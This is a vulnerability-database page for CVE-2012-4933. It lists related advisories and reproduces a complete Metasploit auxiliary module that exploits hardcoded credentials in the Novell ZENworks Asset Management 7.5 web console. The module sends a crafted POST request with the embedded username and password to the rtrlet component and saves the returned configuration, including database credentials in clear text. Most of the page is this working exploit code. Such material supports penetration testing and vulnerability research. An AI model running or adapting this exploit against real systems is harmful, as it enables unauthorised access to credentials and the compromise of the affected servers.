| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2012-4933 | 29 May 201815:50 | – | circl | |
| Novell ZENworks Asset Management Web Console Information Disclosure (CVE-2012-4933) | 2 Dec 201200:00 | – | checkpoint_advisories | |
| CVE-2012-4933 | 20 Oct 201218:00 | – | cve | |
| CVE-2012-4933 | 20 Oct 201218:00 | – | cvelist | |
| Novell ZENworks Asset Management 7.5 Remote File Access | 15 Oct 201214:03 | – | metasploit | |
| Novell ZENworks Asset Management 7.5 Configuration Access | 15 Oct 201214:03 | – | metasploit | |
| Novell ZENworks Asset Management rtrlet Component GetFile_Password Method Hardcoded Credentials Information Disclosure | 25 Oct 201200:00 | – | nessus | |
| CVE-2012-4933 | 20 Oct 201218:55 | – | nvd | |
| Novell ZENWorks Asset Management 7.5 Hardcoded Credentials Vulnerability (HTTP) | 26 Oct 201200:00 | – | openvas | |
| Novell ZENworks Asset Management 7.5 Remote File Access | 1 Sep 202400:00 | – | packetstorm |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
'Description' => %q{
This module exploits a hardcoded user and password for the GetConfig maintenance
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
Console and can be triggered by sending a specially crafted request to the rtrlet component,
allowing a remote unauthenticated user to retrieve the configuration parameters of
Novell Zenworks Asset Management, including the database credentials in clear text.
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez' # Also the discoverer
],
'References' =>
[
[ 'CVE', '2012-4933' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2012/10/11/cve-2012-4933-novell-zenworks/' ]
]
))
register_options(
[
Opt::RPORT(8080),
])
end
def run_host(ip)
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
print_status("#{rhost}:#{rport} - Sending request...")
res = send_request_cgi({
'uri' => '/rtrlet/rtr',
'method' => 'POST',
'data' => post_data,
}, 5)
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
print_good("#{rhost}:#{rport} - File retrieved successfully!")
path = store_loot(
'novell.zenworks_asset_management.config',
'text/html',
ip,
res.body,
nil,
"Novell ZENworks Asset Management Configuration"
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
return
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation